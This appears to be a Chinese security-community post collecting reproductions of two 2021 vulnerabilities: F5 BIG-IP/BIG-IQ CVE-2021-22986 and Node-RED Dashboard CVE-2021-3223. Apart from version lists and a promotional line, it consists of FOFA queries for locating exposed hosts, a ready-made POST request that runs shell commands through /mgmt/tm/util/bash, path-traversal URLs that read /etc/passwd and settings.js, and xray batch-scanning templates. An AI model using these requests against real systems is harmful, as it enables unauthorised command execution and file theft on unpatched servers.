F5 BIG-IP & Node-RED漏洞復(fù)現(xiàn)集合
作者:huluwa 編輯:白帽子社區(qū)運(yùn)營(yíng)團(tuán)隊(duì)
"白帽子社區(qū)在線(xiàn)CTF靶場(chǎng)BMZCTF,歡迎各位在這里練習(xí)、學(xué)習(xí),BMZCTF全身心為網(wǎng)絡(luò)安全賽手提供優(yōu)質(zhì)學(xué)習(xí)環(huán)境,鏈接(http://www.bmzclub.cn/)
"

1.漏洞描述
2.影響版本
F5 BIG-IP 16.0.0-16.0.1F5 BIG-IP 15.1.0-15.1.2F5 BIG-IP 14.1.0-14.1.3.1F5 BIG-IP 13.1.0-13.1.3.5F5 BIG-IP 12.1.0-12.1.5.2F5 BIG-IQ 7.1.0-7.1.0.2F5 BIG-IQ 7.0.0-7.0.0.1F5 BIG-IQ 6.0.0-6.1.0
FOFA查詢(xún)語(yǔ)法:icon_hash="-335242539"POC:POST /mgmt/tm/util/bash HTTP/1.1Host: IP:8443Connection: closeContent-Length: 39Cache-Control: max-age=0Authorization: Basic YWRtaW46QVNhc1M=X-F5-Auth-Token:Upgrade-Insecure-Requests: 1Content-Type: application/json{"command":"run","utilCmdArgs":"-c id"}

附xray 批量檢測(cè)腳本:
name: poc-yaml-f5-big-ip-rce-cve-2021-22986set:r1: randomInt(800000000, 1000000000)r2: randomInt(800000000, 1000000000)rules:- method: POSTpath: /mgmt/tm/util/bashheaders:Content-Type: application/jsonAuthorization: Basic YWRtaW46QVNhc1M=X-F5-Auth-Token: " "body: >-{"command":"run","utilCmdArgs":"-c 'expr {{r1}} + {{r2}}'"}follow_redirects: falseexpression: |response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))detail:author: huluwalinks:- https://support.f5.com/csp/article/K03009991

Node-RED由于未對(duì)url中傳輸?shù)穆窂竭M(jìn)行嚴(yán)格過(guò)濾,導(dǎo)致攻擊者可構(gòu)造特殊路徑進(jìn)行任意文件讀取,比如settings.js、passwd文件等
Node-Red-Dashboard version < 2.26.2
(Node-Red插件Node-Red-Dashboard,如果未安裝此插件,或插件版本高于2.26.2,則不受影響)
FOFA查詢(xún)語(yǔ)法:title="Node-RED"POC:/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/ui_base/js/..%2f..%2f..%2f..%2fsettings.js


name: poc-yaml-node-red-cve-2021-3223rules:- method: GETpath: /ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswdexpression: |response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)detail:author: huluwalinks:- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-3223
評(píng)論
圖片
表情
